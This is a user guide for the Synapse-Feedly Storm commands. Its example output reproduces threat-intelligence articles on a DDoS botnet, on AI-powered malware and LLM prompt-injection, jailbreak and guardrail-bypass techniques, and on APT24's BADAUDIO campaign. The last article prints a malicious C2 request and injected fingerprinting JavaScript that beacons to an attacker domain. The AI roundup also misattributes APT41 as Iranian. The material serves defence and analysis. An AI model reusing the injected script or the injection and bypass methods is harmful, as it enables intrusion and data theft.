User Guide
Synapse-Feedly User Guide
Synapse-Feedly adds new Storm commands to allow you to query the Feedly API using your existing API key.
Getting Started
Check with your Admin to enable permissions and find out if you need a personal API key.
Examples
Setting your personal API key
To setup a personal use API key:
> feedly.config.add myconfig myapikey --scope self
Synapse-Feedly config "myconfig" added
Use feedly.streams.list to list your Team’s Feeds
> feedly.streams.list --size 4
meta:feed=baba66dbc8a8c531f486a0e6342cff12
.created = 2025/11/28 18:24:03.327
:id = feed/https://feedly.com/f/alert/af426331-d70a-4fac-a3dc-732f851eeea6
:name = cyberattacks x finance industry
:source = 65f646d730ffa68037a6f23c28c5340d
:type = feedly.stream
:url = https://feedly.com/f/alert/af426331-d70a-4fac-a3dc-732f851eeea6.json
meta:feed=bf0cdf2828e021e58dcb3885cc21adb9
.created = 2025/11/28 18:24:03.333
:id = feed/https://feedly.com/f/alert/7e9237cb-6607-4b3c-8639-80c4637d34a9
:name = threat intelligence reports x new malware
:source = 65f646d730ffa68037a6f23c28c5340d
:type = feedly.stream
:url = https://feedly.com/f/alert/7e9237cb-6607-4b3c-8639-80c4637d34a9.json
meta:feed=0547e6574811cf2945368e4189487c17
.created = 2025/11/28 18:24:03.336
:id = feed/http://googleprojectzero.blogspot.com/feeds/posts/default
:name = project zero
:source = 65f646d730ffa68037a6f23c28c5340d
:type = feedly.stream
:url = https://googleprojectzero.blogspot.com/
meta:feed=f68639f441757b221a4246ae3a632e34
.created = 2025/11/28 18:24:03.340
:id = feed/https://feedly.com/f/alert/0d1b5b33-d344-429b-8f12-db780f3c2aa4
:name = scattered spider x tactics and techniques
:source = 65f646d730ffa68037a6f23c28c5340d
:type = feedly.stream
:url = https://feedly.com/f/alert/0d1b5b33-d344-429b-8f12-db780f3c2aa4.json
Use feedly.streams.get to fetch a Feed’s articles/IOCs/ATT&CK data
To fetch the two most recent articles for a stream, and not any IOCs or article thumbnails:
> meta:feed#my.feedly.newmalware | feedly.streams.get --yield --size 2 --no-iocs --no-thumbnails
media:news=645a265678ced831f71a6baf59e6a54d
.created = 2025/11/28 18:24:03.670
:authors =
:body = Executive Summary
As a major player in the field of distributed denial-of-service (DDoS) detection and mitigation, it is crucial for us to closely monitor evolving threats in the DDoS landscape. Over the last year, NETSCOUT analysts observed a handful of newly emerged botnets, incapable of packet spoofing but potent sources of direct-path DDoS attacks. One of the most notable is the
Aisuru botnet
, which our ASERT group recently reported. Prior to Aisuru, another significant botnet, Eleven11, emerged with distinct command-and-control (C2) infrastructure characteristics.
Key Findings
Eleven11 botnet was discovered through the analysis of unusually large bandwidth patterns during DDoS attacks in February 2025, classifying it as part of the novel TurboMirai Internet of Things (IoT) botnet family.
Another botnet, “RapperBot”, discovered in 2021, shares the same C2 infrastructure, indicating Eleven11 was active for far longer than initially assumed and was already previously identified as RapperBot.
Digital traces tell a story of how the operators kept innovating the botnet to increase resiliency. One of these resiliency features is the use of OpenNIC, an alternative DNS root.
NETSCOUT analysts saw a drop of activity in late July and early August. In mid-August, authorities revealed an arrest and the dismantling of the botnet.
Discovery of Eleven11 Botnet
In late February 2025, a security researcher in the field posted about a newly discovered botnet with a proclaimed record-breaking firepower exceeding 6Tbps. NETSCOUT observed portions of the attack through our ATLAS telemetry. Building on existing tracking technology, we created an innovative pipeline that incorporates attack metadata to monitor direct-path infrastructure, using the Eleven11 botnet as an initial test case.
Technical Analysis
The botnet’s activity already had been tracked since 2021 and was reported under the name RapperBot in 2022. A post from
researchers in 2022
indicates that the botnet’s initial C2 servers were hardcoded as IPv4 addresses in the malware itself.
In the search for more traces, ASERT discovered malware samples of this same botnet family on sandbox platforms. The reports originated in July (
any.run
and
joesandbox.com
) and December 2024 (
joesandbox.com
), revealing once more that Eleven11 existed prior to the initial announcement on Mastodon in February 2025. These reports also reveal that the botnet’s source code matured, leveraging registered domain names instead of hardcoded IPv4 addresses to connect to C2 infrastructure. These domain names, present in the .libre zone, allowed the culprits behind this botnet to dynamically reconfigure C2 servers, once compromised, without redistributing new versions of the malware. The domain names “registered” in .libre are administered by
OpenNIC
, an alternative DNS root known for its lax moderation that attracts illicit activity.
Analysts at ASERT investigated the domain names from the malware sandbox reports and found that C2 server IP addresses were configured in DNS TXT records of the alternative DNS root. In the early days, addresses were encapsulated between < and > brackets, later separated by pipe characters, indicating yet another implementation on how C2 IP addresses were processed by clients.
Reverse-engineering researchers
also shared versions of the malware that opted for domain names registered as ICANN domain names in the new generic top-level domains (gTLDs) .live and .info. The domain names resemble a domain-generation algorithm. Although the TXT records of the OpenNIC domain names held the C2 server IPs in plain text, the ICANN records encapsulated C2 server IPs in an encrypted string.
NETSCOUT’s threat intelligence team steadily gathered intelligence about the C2 servers. Attempts to identify the networks in which C2 infrastructure was home revealed that many of those poorly moderated networks were not only known, but also already shared with NETSCOUT’s customers via our ATLAS Intelligence Feed (AIF). AIF protects customers by enabling them to identify and block traffic originating from or destined for compromised infrastructure within their own perimeter.
Leveraging Layer 3 Telemetry
The botnet is known to be a modified Mirai variant. One important characteristic of Mirai-like botnets is that many of them lack the ability to spoof source addresses while generating attack traffic. This inadvertently reveals the compromised host’s true IP address when participating in attacks. We leveraged this characteristic to identify migration patterns over the internet based on known sources from the past and feed that into novel ways to attribute DDoS attacks to the botnet.
Figure 1:
Machine learning–enhanced analysis of Layer 3 telemetry enables NETSCOUT’s novel methodology for detecting and characterizing botnet DDoS operations, and also for attribution—in this case to the Eleven11 botnet.
With the help of the machine learning (ML) toolbox, the threat intelligence team implemented novel methodologies to identify DDoS events linked to the botnet in question. A noticeable decline was observed in late July; the botnet went dark in early August with no apparent explanation.
Attack Insights
Visible in Figure 1, NETSCOUT’s ML-based attribution of DDoS events to the botnet shows a peak of weekly DDoS activity in March 2025, slowly fading off until attribution stops by the end of July. The small bars in August are likely false positives. The botnet’s C2 servers had been dismantled by authorities weeks earlier.
Figure 2:
A closer look at the DDoS event impact (in Gbps) reveals that the Eleven11, or RapperBot, generated particularly high volumes of traffic.
Between late February and August, NETSCOUT attributed ~3,600 DDoS events to this botnet. High-impact DDoS attacks with hundreds of Gbps were frequently observed, as illustrated in Figure 2. The high-bandwidth characteristic was also observed in a later discovered botnet called Aisuru. This notable DDoS characteristic forms a new class of IoT botnets. Due to IP address rotation, exact counts of involved hosts are difficult to determine. Estimates characterize this botnet as a moderately sized network of infected systems in the mid five-digit range of infected hosts at peak.
Events in August 2025
Mid-August, the renowned cybersecurity journalist Brian Krebs published an article
on the Eleven11 botnet
, revealing that one of the operators was caught and arrested by authorities—an assertion confirmed via a
press release
. Our data validates that authorities subsequently seized C2 infrastructure and started to dismantle the botnet’s infrastructure based on a lack of continued activity following the arrest.
Although the botnet has likely been rendered inoperable, compromised devices remain vulnerable. It is likely a matter of time until hosts are hijacked again and conscripted as a compromised node for the next botnet. Therefore, ASERT continues to analyze attack details and the migration of compromised hosts to protect our customers from future threats of this magnitude.
Recommendations on Alternative DNS Roots
For a large part of RapperBot’s operation, the C2 servers were configured in TXT records of an alternative DNS root with the name OpenNIC. For ordinary businesses, there is no value to having access to OpenNIC domain names. The experiment mainly attracts internet niche technologists, networking geeks, researchers, or simply malicious actors. Consequently, we recommend that customers simply block any name resolution of non-official ICANN domain names. The OpenNIC domain names are:
.bbs
.chan
.cyb
.dyn
.geek
.gopher
.indy
.libre
.neo
.null
.o
.oss
.oz
.parody
.pirate
ASERT recommends blocking these domain names on an enterprise’s resolver.
References
ASERT Threat Summary:
:ext:id = mfw+vieodNEbeonvFvSX8PBLyU7fhBd7b7n0XdK0saI=_19a597a3265:e76bdc0:d074fe5d
:published = 2025/11/06 14:00:00.000
:summary = Executive Summary As a major player in the field of distributed denial-of-service (DDoS) detection and mitigation, it is crucial for us to closely monitor evolving threats in the DDoS landscape. Over the last year, NETSCOUT analysts observed a handful of newly emerged botnets, incapable of packet spoofing but potent...
:title = 161 days of eleven11
:topics = ['cyber security', 'malware', 'threat intelligence reports']
:url = https://www.netscout.com/blog/asert/161-days-eleven11
:url:fqdn = www.netscout.com
media:news=d374d19ab36b6c6d3fe4361a94b71c0b
.created = 2025/11/28 18:24:03.690
:authors = 43ab59b396315f54dc9c86de0b2826a6
:body = Artificial Intelligence (AI) and Large Language Models (LLMs) are profoundly reshaping the cybersecurity landscape, creating a complex dual reality: they are simultaneously empowering threat actors with unprecedented offensive capabilities and arming defenders with critical new tools. This emerging dynamic defines a new frontier in cyber warfare, where the boundaries between attack and defense are increasingly blurred by AI’s transformative power. From self-modifying malware to sophisticated state-sponsored campaigns, the offensive applications of AI are accelerating, demanding equally advanced defensive countermeasures.
The proliferation of AI-powered threats is mirrored by significant vulnerabilities within AI models themselves. Attackers are actively exploiting these weaknesses, particularly through prompt injection attacks, to facilitate data exfiltration and malicious manipulation. This expanding attack surface presents a formidable challenge for cybersecurity professionals. However, generative AI is also proving to be an invaluable asset for defenders, acting as a force multiplier that dramatically accelerates complex tasks such as malware reverse engineering, thereby enabling security teams to respond more effectively to rapidly evolving threats.
The Escalation of AI-Powered Malware and Model Misuse
Threat actors are increasingly leveraging AI and LLMs to develop more sophisticated malware and streamline their malicious operations. Recent findings from Google Threat Intelligence Group (GTIG) highlight this trend with the discovery of
PROMPTFLUX
, an experimental Visual Basic Script (VBScript) malware. This innovative threat interacts with Google’s Gemini AI model API to dynamically rewrite its own source code on an hourly basis, requesting specific VBScript obfuscation and evasion techniques. This “just-in-time” self-modification strategy is designed to bypass static signature-based detection mechanisms. While PROMPTFLUX is currently in a developmental or testing phase and lacks immediate victim compromise capabilities, it establishes persistence by saving obfuscated versions to the Windows Startup folder and attempts to propagate via removable drives and network shares. Google attributes this to a financially motivated threat actor with a broad, industry-agnostic approach.
Beyond PROMPTFLUX, Google has identified several other LLM-powered malware variants:
FRUITSHELL:
A PowerShell-based reverse shell designed to evade detection by LLM-powered security systems.
PROMPTLOCK:
A cross-platform ransomware proof-of-concept that uses an LLM to dynamically generate and execute malicious Lua scripts.
PROMPTSTEAL (aka LAMEHUG):
A data miner deployed by the Russian state-sponsored actor APT28 in attacks against Ukraine, leveraging Qwen2.5-Coder-32B-Instruct via the Hugging Face API to generate commands.
QUIETVAULT:
A JavaScript-based credential stealer specifically targeting GitHub and NPM tokens.
State-sponsored threat actors are also actively misusing Gemini AI to enhance their cyber operations. Their tactics include:
China-nexus actors:
Utilizing Gemini for initial reconnaissance, crafting phishing techniques, delivering payloads, and seeking assistance with lateral movement and data exfiltration. They often bypass AI guardrails by framing prompts as Capture-The-Flag (CTF) exercises.
Iranian groups (e.g., APT41, MuddyWater/Mango Sandstorm):
APT41 has sought aid with code obfuscation and developing C++ and Golang code for tools, including a C2 framework named OSSTUN. MuddyWater has conducted extensive research for custom malware development and circumvented safety barriers by impersonating students.
APT42 (aka Charming Kitten and Mint Sandstorm):
Crafting phishing campaign materials, translating articles, researching Israeli defense, and developing a “Data Processing Agent” to convert natural language requests into SQL queries for sensitive data insights.
North Korean actors (e.g., UNC1069/CryptoCore/MASAN):
Generating lure material for social engineering, developing cryptocurrency-stealing code, crafting fraudulent software update instructions to extract credentials, and employing deepfake images and videos.
TraderTraitor:
Employing AI for code development, exploit research, and tool improvement.
Exploitable Weaknesses: Vulnerabilities in AI Models
Even leading AI models are not immune to attack, exhibiting various vulnerabilities that can be exploited for data exfiltration and malicious manipulation. Tenable Research identified seven distinct vulnerabilities and attack techniques in OpenAI’s GPT-4o and GPT-5 models, some of which have since been addressed. These issues primarily facilitate indirect prompt injection attacks, where the LLM’s expected behavior is subtly manipulated to perform unintended actions or leak sensitive data.
Key prompt injection techniques and vulnerabilities identified include:
Indirect Prompt Injection via Browsing Context:
Malicious instructions embedded in web page comments summarized by ChatGPT.
Zero-Click Indirect Prompt Injection in Search Context:
Malicious instructions indexed by search engines, triggered by natural language queries to the LLM.
Prompt Injection via One-Click Crafted Links:
Exploiting specially crafted links.
Safety Mechanism Bypass:
Abusing Bing’s allow-listed URLs to mask malicious links.
Conversation Injection:
Inserting malicious instructions into websites to cause unintended replies in subsequent conversational contexts.
Malicious Content Hiding:
Leveraging markdown rendering bugs to conceal harmful content.
Memory Injection:
Poisoning ChatGPT’s memory with hidden instructions from summarized websites.
Further research has revealed a broader range of prompt injection and AI security concerns:
PromptJacking:
Exploiting Remote Code Execution (RCE) vulnerabilities in Anthropic Claude’s connectors for unsanitized command injection.
“Claude pirate”:
Abusing Claude’s Files API for data exfiltration.
“Agent session smuggling”:
Leveraging the Agent2Agent (A2A) protocol to inject instructions into cross-agent communication sessions.
“Prompt inception”:
Using prompt injections to amplify bias or falsehoods, leading to disinformation.
“Shadow escape”:
A zero-click attack to steal sensitive data from interconnected systems via Model Context Protocol (MCP) setups.
Microsoft 365 Copilot Vulnerabilities:
Found susceptible to indirect prompt injection using Mermaid diagrams and CSS for arbitrary data exfiltration.
CamoLeak (CVSS: 9.6) in GitHub Copilot Chat:
A critical vulnerability allowing covert exfiltration of secrets and source code from private repositories and full control over Copilot’s responses through a combination of Content Security Policy (CSP) bypass and remote prompt injection via hidden comments in pull requests.
LatentBreak:
A white-box jailbreak attack that generates natural adversarial prompts to evade safety mechanisms.
These underlying issues underscore that prompt injection remains a systemic problem with LLMs, not expected to be systematically fixed in the near future. Additionally, concerns like “LLM brain rot” from training on “junk data,” the feasibility of backdooring AI models with a small number of poisoned documents, and “Moloch’s Bargain”—where competitive optimization of LLMs can inadvertently lead to safety concerns like deceptive product representation—further complicate the AI security landscape.
Generative AI as a Force Multiplier for Reverse Engineering
In the face of these escalating threats, generative AI, particularly advanced models like GPT-5, is proving to be a significant asset for cybersecurity defenders. It dramatically accelerates the analysis of complex and evasive malware such as XLoader, which presents considerable challenges due to its runtime decryption, multiple layers of encryption, obfuscated API calls, injections into system processes, extensive sandbox evasion techniques, encrypted network traffic, and camouflaged C2 addresses. The rapid development cadence of such malware quickly renders previous research obsolete.
Check Point Research has demonstrated two complementary workflows for leveraging GPT-5 in malware analysis:
Live Model Context Protocol (MCP) Integration:
This approach grants the LLM direct access to analysis tools like IDA Pro, x64dbg, and VMware. This enables real-time querying, memory inspection, and debugger control, facilitating live data pulling and iterative “experiment and observe” cycles during analysis.
“Offline” Data Pipeline with ChatGPT:
This method involves exporting a full static snapshot of the malware to ChatGPT’s environment. The AI then performs static analysis, generates, refines, and executes Python scripts against the binary within its cloud sandbox. This offers benefits such as no persistent local session, easy repeatability, and safe script execution.
During the XLoader analysis, researchers refined the process by:
Enforcing an “evidence-first” rule to prevent AI “guessing” missing values, requiring direct quotes from exported data.
Banning cosmetic transformations and requiring the AI to identify actual errors in output shaping.
Implementing a “local-first” rule to mitigate requests for already-provided data.
In a specific case study using GPT-5 for XLoader analysis, the AI demonstrated impressive capabilities:
Initial Analysis:
Correctly identified RC4 implementation, determined the sample was packed, inferred similarities to XLoader, detected API call obfuscation, and pinpointed the handover to decrypted code.
Payload Decryption:
Identified two rounds of RC4 decryption and collected relevant virtual addresses and offsets. Human intervention was still required to obtain real-time keys via MCP.
Function Decryption Schemes:
Partially tackled XLoader’s complex function decryption involving 6-byte or 4-byte markers, XOR modifiers, multi-layer RC4, and patching. While AI reimplemented algorithms and located some keys, human assistance was needed for a universal script due to scattered key derivation logic.
API Call Deobfuscation:
AI described resolution algorithms and generated IDAPython scripts to deobfuscate API calls, though this required human interaction for testing and error correction.
String Decryption Routines:
Analyzed RC4-based string decryption, leading to an IDAPython script that successfully decrypted 175 strings.
Domain Decryption:
Successfully analyzed the domain generation function, which stores encrypted domain names in Base64 with multiple layers of RC4 encryption and scattered key material. Human assistance was needed to locate specific keys (e.g.,
ctx+0x23D0
,
SALT_DWORD
) not directly referenced or highly obfuscated. Once provided, AI successfully decrypted domain names and generated 4-character URL tags.
Ultimately, generative AI significantly reduces the time required for mechanical reverse engineering tasks such as triage, deobfuscation, and scripting, acting as a powerful “force multiplier.” However, human expertise remains crucial for addressing the most sophisticated protections, fine-tuning AI outputs, and overcoming limitations in AI’s independent reasoning or data access. The arms race between malware authors and defenders is poised to accelerate further with the broader adoption of AI in both offensive and defensive cybersecurity strategies.
:ext:id = dsDalUl/A1RgwYSQs7wa6KIBQ2BGKotFk2bwZL4HMaU=_19a55e2c619:dfaab07:d074fe5d
:published = 2025/11/05 21:15:20.000
:summary = As AI cybersecurity rapidly evolves, a new arms race emerges where artificial intelligence fuels both sophisticated malware and powerful defensive strategies. This article explores the latest in AI-powered threats, critical model vulnerabilities, and how generative AI is becoming an indispensable tool for cyber defense.
:title = ai cybersecurity: navigating the double-edged sword of advanced threats and defense
:topics = ['ai cybersecurity', 'ai threats', 'ai-powered malware', 'artificial intelligence', 'crime', 'cyber news & updates', 'cyber security', 'defense industry', 'hacking', 'proof of exploit', 'threat intelligence reports']
:url = https://cyberwarzone.com/2025/11/05/ai-cybersecurity-navigating-the-double-edged-sword-of-advanced-threats-and-defense/
:url:fqdn = cyberwarzone.com
To fetch the two most recent articles and all associated data:
> meta:feed#my.feedly.newmalware | feedly.streams.get --yield --size 2
WARNING: STIX bundle ingest has no relationship definition for: ('threat-actor', 'originates-from', 'location').
WARNING: STIX bundle ingest has no relationship definition for: ('intrusion-set', 'originates-from', 'location').
media:news=4290ba830e61b24c8ee76d816584085e
.created = 2025/11/28 18:24:03.886
:authors =
:body = Written by: Harsh Parashar, Tierra Duncan, Dan Perez
Google Threat Intelligence Group (GTIG) is tracking a long-running and adaptive cyber espionage campaign by APT24, a People's Republic of China (PRC)-nexus threat actor. Spanning three years, APT24 has been deploying BADAUDIO, a highly obfuscated first-stage downloader used to establish persistent access to victim networks.
While earlier operations relied on broad strategic web compromises to compromise legitimate websites, APT24 has recently pivoted to using more sophisticated vectors targeting organizations in Taiwan. This includes the repeated compromise of a regional digital marketing firm to execute supply chain attacks and the use of targeted phishing campaigns.
This report provides a technical analysis of the BADAUDIO malware, details the evolution of APT24's delivery mechanisms from 2022 to present, and offers actionable intelligence to help defenders detect and mitigate this persistent threat.
As part of our efforts to combat serious threat actors, GTIG uses the results of our research to improve the safety and security of Google’s products and users. Upon discovery, all identified websites, domains, and files are added to the
Safe Browsing
blocklist in order to protect web users across major browsers. We also conducted a series of victim notifications with technical details to compromised sites,
enabling affected organizations to secure their sites and prevent future infections.
Figure 1: BADAUDIO campaign overview
Payload Analysis: BADAUDIO and Cobalt Strike Beacon Integration
The BADAUDIO malware is a custom first-stage downloader written in C++ that downloads, decrypts, and executes an AES-encrypted payload from a hard-coded command and control (C2) server. The malware collects basic system information, encrypts it using a hard-coded AES key, and sends it as a cookie value with the GET request to fetch the payload. The payload, in one case identified as Cobalt Strike Beacon, is decrypted with the same key and executed in memory.
GET https://wispy[.]geneva[.]workers[.]dev/pub/static/img/merged?version=65feddea0367 HTTP/1.1
Host: wispy[.]geneva[.]workers[.]dev
Cookie: SSID=0uGjnpPHjOqhpT7PZJHD2WkLAxwHkpxMnKvq96VsYSCIjKKGeBfIKGKpqbRmpr6bBs8hT0ZtzL7/kHc+fyJkIoZ8hDyO8L3V1NFjqOBqFQ==
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Connection: Keep-Alive
Cache-Control: no-cache
--------------------------
GET
cfuvid=Iewmfm8VY6Ky-3-E-OVHnYBszObHNjr9MpLbLHDxX056bnRflosOpp2hheQHsjZFY2JmmO8abTekDPKzVjcpnedzNgEq2p3YSccJZkjRW7-mFsd0-VrRYvWxHS95kxTRZ5X4FKIDDeplPFhhb3qiUEkQqqgulNk_U0O7U50APVE
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: Keep-Alive
Cache-Control: no-cache
Figure 2: BADAUDIO code sample
The malware is engineered with control flow flattening—a sophisticated obfuscation technique that systematically dismantles a program's natural, structured logic. This method replaces linear code with a series of disconnected blocks governed by a central "dispatcher" and a state variable, forcing analysts to manually trace each execution path and significantly impeding both automated and manual reverse engineering efforts.
Figure 3: Control flow flattening heavily obfuscates BADAUDIO malware (
expand image
)
BADAUDIO typically manifests as a malicious Dynamic Link Library (DLL) leveraging DLL Search Order Hijacking (MITRE ATT&CK T1574.001) for execution via legitimate applications. Recent variants observed indicate a refined execution chain: encrypted archives containing BADAUDIO DLLs along with VBS, BAT, and LNK files.
These supplementary files automate the placement of the BADAUDIO DLL and a legitimate executable into user directories, establish persistence through legitimate executable startup entries, and trigger the DLL sideloading. This multi-layered approach to execution and persistence minimizes direct indicators of compromise.
Upon execution, BADAUDIO collects rudimentary host information: hostname, username, and system architecture. This collected data is then hashed and embedded within a cookie parameter in the C2 request header. This technique provides a subtle yet effective method for beaconing and identifying compromised systems, complicating network-based detection.
In one of these cases, the subsequent payload, decrypted using a hard-coded AES key, has been confirmed as Cobalt Strike Beacon. However, it is not confirmed that Cobalt Strike is present in every instance. The Beacon payload contained a relatively unique watermark that was previously observed in a separate APT24 campaign, shared in the Indicators of Compromise section.
Cobalt Strike watermarks
are a unique value generated from and tied to a given "CobaltStrike.auth" file. This value is embedded as the last 4 bytes for all BEACON stagers and in the embedded configuration for full backdoor BEACON samples.
Campaign Overview: BADAUDIO Delivery Evolves
Over three years, APT24 leveraged various techniques to deliver BADAUDIO, including strategic web compromises, repeated supply-chain compromise of a regional digital marketing firm in Taiwan, and spear phishing.
Figure 4: BADAUDIO campaign overview
Public Strategic Web Compromise Campaign
Beginning in November 2022 we observed over 20 compromised websites spanning a broad array of subjects from regional industrial concerns to recreational goods, suggesting an opportunistic approach to initial access with true targeting selectively executed against visitors the attackers identified via fingerprinting. The legitimate websites were weaponized through the injection of a malicious JavaScript payload.
Figure 5: Strategic web compromise attack flow to deliver BADAUDIO malware
This script exhibited an initial layer of targeting, specifically excluding macOS, iOS, Android, and various Microsoft Internet Explorer/Edge browser variants to focus exclusively on Windows systems. This selectivity suggests an adversary immediately narrowing their scope to optimize for a specific, likely high-value, victim profile.
The injected JavaScript performed a critical reconnaissance function by employing the FingerprintJS library to generate a unique browser fingerprint. This fingerprint, transmitted via an HTTP request to an attacker-controlled domain, served as an implicit validation mechanism. Upon successful validation, the victim was presented with a fabricated pop-up dialog, engineered to trick the user into downloading and executing BADAUDIO malware.
$(window).ready(function() {
var userAgent = navigator.userAgent;
var isIE = userAgent.indexOf("compatible") > -1 && userAgent.indexOf("MSIE") > -1;
var isEdge = userAgent.indexOf("Edge") > -1 && !isIE;
var isIE11 = userAgent.indexOf('Trident') > -1 && userAgent.indexOf("rv:11.0") > -1;
var isMac = userAgent.indexOf('Macintosh') > -1;
var isiPhone = userAgent.indexOf('iPhone') > -1;
var isFireFox = userAgent.indexOf('Firefox') > -1;
if (!isIE && !isEdge && !isIE11 && !isMac && !isiPhone && !isFireFox) {
var tag_script = document.createElement("script");
tag_script.type = "text/javascript";
tag_script.src = "https://cdn.jsdelivr.net/npm/@fingerprintjs/fingerprintjs@2/dist/fingerprint2.min.js";
tag_script.onload = "initFingerprintJS()";
document.body.appendChild(tag_script);
if (typeof(callback) !== "undefined") {
tag_script.onload = function() {
callback();
}
}
function callback() {
var option = {
excludes: {
screenResolution: true,
availableScreenResolution: true,
enumerateDevices: true
}
}
new Fingerprint2.get(option, function(components) {
var values = components.map(function(component) {
return component.value
})
var murmur = Fingerprint2.x64hash128(values.join(''), 31);
console.log(murmur)
var script_tag = document.createElement("script");
script_tag.setAttribute("src", "https://www[.]twisinbeth[.]com/query.php?id=" + murmur);
document.body.appendChild(script_tag);
});
}
}
});
Figure 6: Early malicious fingerprinting JS used in strategic web compromise campaigns
Figure 7: Example of attacker fake update pop-up dialog impersonating Chrome to lure targets to download and execute BADAUDIO malware
The attackers consistently shift their infrastructure, using a mix of newly registered domains and domains they have previously compromised. We last observed this tactic in early September 2025.
Escalation: Supply Chain Compromise for Strategic Web Compromises at Scale
In July 2024, APT24 compromised a regional digital marketing firm in Taiwan- a supply chain attack that impacted more than 1,000 domains. Notably, the firm experienced multiple re-compromises over the last year, demonstrating APT24's persistent commitment to the operation.
We initiated a multifaceted remediation effort to disrupt these threats. In addition to developing custom logic to identify and block the modified, malicious JavaScript, GTIG distributed victim notifications to the individual compromised websites and the compromised marketing firm. These notifications provided specific details about the threat and the modifications made to the original script, enabling affected organizations to secure their sites and prevent future infections.
In the first iteration of the supply chain compromise, APT24 injected the malicious script into a widely used JavaScript library (MITRE ATT&CK T1195.001) provided by the firm, leveraging a typosquatting domain to impersonate a legitimate Content Delivery Network (CDN). The deobfuscated JavaScript reveals a multi-stage infection chain:
Dynamic Dependency Loading: The script dynamically loads legitimate jQuery and FingerprintJS2 libraries (MITRE ATT&CK T1059.007) from a public CDN if not already present, ensuring consistent execution across diverse web environments.
Multi-Layer JS Concealment: During a re-compromise discovered in July 2025, the adversary took additional steps to hide their malicious code. The highly obfuscated script (MITRE ATT&CK T1059) was deliberately placed within a maliciously modified JSON file served by the vendor, which was then loaded and executed by another compromised JavaScript file. This tactic effectively concealed the final payload in a file type and structure not typically associated with code execution.
Advanced Fingerprinting: FingerprintJS2 is utilized to generate an x64hash128 browser and environmental fingerprint (MITRE ATT&CK T1082) . The x64hash128 is the resulting 128-bit hash value produced by the
MurmurHash3
algorithm, which processes a large input string of collected browser characteristics (such as screen resolution, installed fonts, and GPU details) to create a unique, consistent identifier for the user's device.
Covert Data Exfiltration and Staging: A POST request, transmitting Base64-encoded reconnaissance data (including host, url, useragent, fingerprint, referrer, time, and a unique identifier), is sent to an attacker's endpoint (MITRE ATT&CK T1041).
Adaptive Payload Delivery: Successful C2 responses trigger the dynamic loading of a subsequent script from a URL provided in the response's data field. This cloaked redirect leads to BADAUDIO landing pages, contingent on the attacker's C2 logic and fingerprint assessment (MITRE ATT&CK T1105
).
Tailored Targeting: The compromise in June 2025 initially employed conditional script loading based on a unique web ID (the specific domain name) related to the website using the compromised third-party scripts. This suggests tailored targeting, limiting the strategic web compromise (MITRE ATT&CK T1189) to a single domain. However, for a ten-day period in August, the conditions were temporarily lifted, allowing all 1,000 domains using the scripts to be compromised before the original restriction was reimposed.
Figure 8: Compromised JS supply chain attack to deliver BADAUDIO malware
Targeted Phishing Campaigns
Complementing their broader web-based attacks, APT24 concurrently conducted highly targeted social engineering campaigns. Lures, such as an email purporting to be from an animal rescue organization, leveraged social engineering to elicit user interaction and drive direct malware downloads from attacker-controlled domains.
Separate campaigns abused legitimate cloud storage platforms including Google Drive and OneDrive to distribute encrypted archives containing BADAUDIO. Google protected users by diverting these messages to spam, disrupting the threat actor’s effort to leverage reputable services in their campaigns.
APT24 included pixel tracking links, confirming email opens and potentially validating target interest for subsequent exploitation. This dual-pronged approach—leveraging widely trusted cloud services and explicit tracking—enhances their ability to conduct effective, personalized campaigns.
Outlook
This nearly three-year campaign is a clear example of the continued evolution of APT24’s operational capabilities and highlights the sophistication of PRC-nexus threat actors. The use of advanced techniques like supply chain compromise, multi-layered social engineering, and the abuse of legitimate cloud services demonstrates the actor's capacity for persistent and adaptive espionage.
This activity follows a broader trend GTIG has observed of PRC-nexus threat actors increasingly employing
stealthy tactics
to avoid detection. GTIG actively monitors ongoing threats from actors like APT24 to protect users and customers. As part of this effort, Google continuously updates its protections and has taken specific action against this campaign.
We are committed to sharing our findings with the security community to raise awareness and to disrupt this activity. We hope that improved understanding of tactics and techniques will enhance threat hunting capabilities and lead to stronger user protections across the industry.
Acknowledgements
This analysis would not have been possible without the assistance from FLARE. We would like to specifically thank Ray Leong, Jay Gibble and Jon Daniels for their contributions to the analysis and detections for BADAUDIO.
Indicators of Compromise
A
Google Threat Intelligence (GTI) collection
of related IOCs is available to registered users.
Strategic Web Compromise JS
88fa2b5489d178e59d33428ba4088d114025acd1febfa8f7971f29130bda1213
032c333eab80d58d60228691971d79b2c4cd6b9013bae53374dd986faa0f3f4c
ae8473a027b0bcc65d1db225848904e54935736ab943edf3590b847cb571f980
0e98baf6d3b67ca9c994eb5eb9bbd40584be68b0db9ca76f417fb3bcec9cf958
55e02a81986aa313b663c3049d30ea0158641a451cb8190233c09bef335ef5c7
Strategic Web Compromise — Modified Supplier JS
07226a716d4c8e012d6fabeffe2545b3abfc0b1b9d2fccfa500d3910e27ca65b
5c37130523c57a7d8583c1563f56a2e2f21eef5976380fdb3544be62c6ad2de5
1f31ddd2f598bd193b125a345a709eedc3b5661b0645fc08fa19e93d83ea5459
c4e910b443b183e6d5d4e865dd8f978fd635cd21c765d988e92a5fd60a4428f5
2ea075c6cd3c065e541976cdc2ec381a88b748966f960965fdbe72a5ec970d4e
BADAUDIO Binaries
9ce49c07c6de455d37ac86d0460a8ad2544dc15fb5c2907ed61569b69eefd182
d23ca261291e4bad67859b5d4ee295a3e1ac995b398ccd4c06d2f96340b4b5f8
cfade5d162a3d94e4cba1e7696636499756649b571f3285dd79dea1f5311adcd
f086c65954f911e70261c729be2cdfa2a86e39c939edee23983090198f06503c
f1e9d57e0433e074c47ee09c5697f93fde7ff50df27317c657f399feac63373a
176407b1e885496e62e1e761bbbb1686e8c805410e7aec4ee03c95a0c4e9876f
c7565ed061e5e8b2f8aca67d93b994a74465e6b9b01936ecbf64c09ac6ee38b9
83fb652af10df4574fa536700fa00ed567637b66f189d0bbdb911bd2634b4f0e
Strategic Web Compromise — Stage 2
www[.]availableextens[.]com
www[.]twisinbeth[.]com
www[.]decathlonm[.]com
www[.]gerikinage[.]com
www[.]p9-car[.]com
www[.]growhth[.]com
www[.]brighyt[.]com
taiwantradoshows[.]com
jsdelivrs[.]com
BADAUDIO C2
clients[.]brendns.workers[.]dev
www[.]cundis[.]com
wispy[.]geneva[.]workers[.]dev
www[.]twisinbeth[.]com
tradostw[.]com
jarzoda[.]net
trcloudflare[.]com
roller[.]johallow.workers[.]dev
Cobalt Strike Beacon Watermark
